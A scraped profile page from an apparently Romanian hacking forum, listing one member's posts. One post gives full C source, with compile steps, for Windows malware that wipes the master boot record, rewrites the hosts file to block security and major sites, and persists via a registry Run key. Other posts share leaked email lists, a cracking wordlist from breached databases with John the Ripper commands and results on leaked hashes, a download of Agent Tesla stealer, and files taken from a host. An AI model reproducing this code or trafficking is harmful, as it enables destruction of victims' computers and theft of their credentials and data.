Jump to content

snakersnk

Active Members
  • Posts

    101
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by snakersnk

  1. # Honeypot SSH - All password order by length (length > 4) # Last update: 2015-08-02 22:05:02 UTC # Approximate list : 105932 passwords https://mega.nz/#!OM832J6R!yBjxcSCCLrWLk2qIAEJyBNPU2wu1v1fe_88lgVo5mS4
  2. Usage UNIQPASS is a large password list for use with John the Ripper (JtR) wordlist mode to translate large number of hashes, e.g. MD5 hashes, into cleartext passwords. While we have had good success rate with our standard password list passwords.txt, we found that the list can be made more useful and relevant by including commonly used passwords from the recently leaked databases that have been made public. As a result, we have compiled millions of these unique passwords into UNIQPASS. Such list is especially handy for pentesters to perform comprehensive password audit and also for IT administrators to expose insecure passwords used by their users. Specifications Version 15 released on January 10, 2015 with 243,779,397 entries 1. For use with JtR wordlist mode with --rules set 2. All passwords are unique and listed in sorted order according to their native byte values using UNIX sort command 3. 192,916 of the passwords (UNIQPASS v1) came from English dictionary 4. The remaining passwords were collected from leaked databases from various websites (including major sites e.g. Sony Pictures, Gawker) 5. Max. password length is 30 characters long 6. Password may consist of a-z, 0-9, spaces and special characters ` ~ ! @ # $ % ^ & * ( ) _ - + = { [ } ] | \ : ; " ' < , > . ? / 7. UNIX end-of-line character is used as the newline character 8. Trailing spaces, trailing tabs and NULL bytes have been removed from all passwords 9. List compressed size is 435.8 MB, i.e. the downloadable size 10. The total unmangled entries, 243,779,397, is based on UNIX wc -l output Performance In the following test, we compare the success rate of JtR wordlist cracking mode against a list of 551,638 MD5 hashes using our standard password list passwords.txt vs. UNIQPASS v15. We use JtR 1.8.0 community-enhanced version for this test. The hashes are passwords for accounts from several leaked databases published by LulzSec back in June 2011. $ john --format=raw-MD5 --wordlist=passwords.txt --rules hashes.txt .. $ john --format=raw-MD5 --show hashes.txt .. 219722 password hashes cracked, 331916 left passwords.txt cracked 40% of the hashes using JtR wordlist mode with rules enabled. $ john --format=raw-MD5 --wordlist=uniq.txt --rules hashes.txt .. $ john --format=raw-MD5 --show hashes.txt .. 515260 password hashes cracked, 36378 left UNIQPASS v15 cracked 93% of the hashes using JtR wordlist mode with rules enabled. Upon completing a dictionary attack (wordlist mode), the next step is to resume the same session with JtR incremental mode leaving it to run for a couple hours or until we achieve a desirable yield. This can done with e.g. john --format=raw-MD5 --incremental --max-run-time=3600 hashes.txt. Recommended Tools Depending on your use cases, we recommend one or more of the following password recovery tools for use with UNIQPASS: John the Ripper (JtR) Our current default tool to audit most of the leaked hashes John the Ripper password cracker oclHashcat De facto standard GPU-based password cracker oclHashcat - advanced password recovery hashcat-utils Useful set of utilities to manipulate wordlist hashcat_utils [hashcat wiki] THC-Hydra Fast network logon cracker http://www.thc.org/thc-hydra/ Cain & Abel Password recovery tool for Microsoft Operating Systems oxid.it - Cain & Abel Aircrack-ng 802.11 WEP and WPA-PSK keys cracking program http://www.aircrack-ng.org KisMAC Wireless stumbling and security tool for Mac OS X http://kismac-ng.org https://mega.nz/#!fccGiZ5B!xv-cSBa_bv4IWt2ozlxyg168Nl_Za4dm55QoYyKRhs4
  3. Arhiva are parola, iar pentru cei care chiar au nevoie, useri vechi au prioritate
  4. Salut, am observat ca multi dintre voi au nevoie de mail.uri, majoritatea acestora sunt de gmail daca va ajuta la ceva : https://mega.nz/#!rA1gFarb!3cvMHZT656g06dHf6R7bGtI2PVzxVeaqUAWNCrHjz2M Update 1 : 1444358 mixed mails https://mega.nz/#!3B0yGCBI!28ZSa_kfnAPzjL3xNAPdj0aHsbgqaGkiVBI_FMGQrbE Hint la ambele arhive : 3 OKTOmbrie 534199772429581100 293099913263731460 741782161742091300
  5. Salut, aceasta suprascriere de MBR o sa faca pornirea calculatorului imposibila, testat pe Windows 7 si Windows 8 / 8.1 = rata de success fiind 100% Pentru Windows 8 / 8.1 nu e nevoie de executie ca administrator a fisierului, pe Windows 7 trebuie executat ca administrator fisierul; Pentru inceput avem nevoie de Dev-Cpp, care il putem gasi aici Download Dev-C++ from SourceForge.net Aici aveti codul care trebuie compilat in Dev-cpp, doar copiati codul de aici si apasati F9 pentru compilare #include <Windows.h> DWORD WINAPI CheckTime(){ DWORD write; SYSTEMTIME st; char data[512]; ZeroMemory(&data,sizeof(data)); GetLocalTime(&st); //you can change the date of payload to occur. if(st.wYear==2014){ HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL); WriteFile(disk,data,512,&write,NULL); CloseHandle(disk); ExitWindowsEx(EWX_REBOOT,0); } return 0; } DWORD WINAPI hosts(){ char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31}; char path[60]; DWORD write; GetEnvironmentVariable("windir",path,sizeof(path)); strcat(path,"\\system32\\drivers\\etc\\hosts"); HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL); WriteFile(hFile,data,sizeof(data),&write,NULL); CloseHandle(hFile); return 0; } DWORD WINAPI reg(){ char value[]="Virus.exe"; HKEY hKey; while(1){ RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey); RegSetValueEx(hKey,"Virus",0,REG_SZ,(LPBYTE)value,60); RegCloseKey(hKey); Sleep(10000); } return 0; } int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){ char file[MAX_PATH]; char path[60]; HANDLE hToken; LUID luid; LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid); TOKEN_PRIVILEGES tp; tp.Privileges[0].Luid=luid; tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; tp.PrivilegeCount=1; OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken); AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL); GetModuleFileName(NULL,file,sizeof(file)); GetEnvironmentVariable("windir",path,60); strcat(path,"\\Virus.exe"); CopyFile(file,path,false); CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL); CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL); while(1){ CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL); Sleep(10000); } return 0; } Iar aici un mic tutorial de compilare:
  6. snakersnk

    Whmcs

    @bubu2005 ti.am trimis PM
  7. Salut, aveti idee cine sunt proprietarii trackerelor respective: myxz.org & the-torrents.org Daca da, va rog frumos sa imi trimiteti PM, sau rog chiar ownerii acestor trackere sa imi trimita PM, nu vreau invitatii sau etc pe acestea... Multumesc anticipat
  8. snakersnk

    Whmcs

    Salut, am gasit intr,un host lucrurile astea, ma gandesc ca poate cineva are nevoie, eu pur si simplu le.am extras de acolo si postez aici; Screenshot by Lightshot https://mega.nz/#!DRlGVKab!xc60QXXzI_3xgFtdBtz8igXHnAOXzCpM2Wbt5-xiGn8
  9. Salut, am un cont - Legend User - pe trackerul http://the-torrents.org/ Astept PM de la un utilizator care e interesat
  10. Pentru cine are nevoie de un Key pentru AfterFall Insanity - Extended Edition PM
  11. https://dl.orangedox.com/CKNPBUs6w9c8uf0GS8/Agent%20Tesla%20%5BBeta%5D.zip Am gasit linkul pe alta comunitate, deci rulatil intr,o masina virtuala si reveniti cu reply, eu nu am avut timp sa.l incerc zip pass: ? ? ? ? ? ? ? ? ? ? ? hint; ..REX-3S
  12. Conturile de Steam, sunt toate off .. Nici macar cu Steam resolver nu mai merg
  13. Multumesc mult kNigHt, mai exista totusi oameni care te ajuta...
  14. Screenshot by Lightshot Ai idee cam cat timp dureaza lucrul acesta? am ales 5.4 Done, Am rezolvat cu Cpanelul ^^ Screenshot by Lightshot Multumesc pentru raspunsuri, tot ce trebuie sa folositi este Apache5.5 , nici macar 5.3 .. Nu am inteles inca de ce, dar am reusit pe un alt host cu aceasta versiune, adica 5.5
  15. Pot alege intre 5.2 - 5.3 - 5.4 Screenshot by Lightshot Am ales cum ai spus tu 5.3. acum , o erroare noua ... Screenshot by Lightshot Off, Astept Raspuns, Multumesc
  16. View image: jdq EUu D Help si la mine, nu inteleg din ce cauza, si am verificat! Multumesc, si astept raspuns
  17. shorten URLs and earn up to $8.70 / 1000 visitors Castigi bine din asta?
  18. 1 cod din toate nu e functionabil...
  19. Daca doresti, imi poti trimite si mie parola ? Multumesc Anticipat
  20. Inregistrat pe link.ul tau
×
×
  • Create New...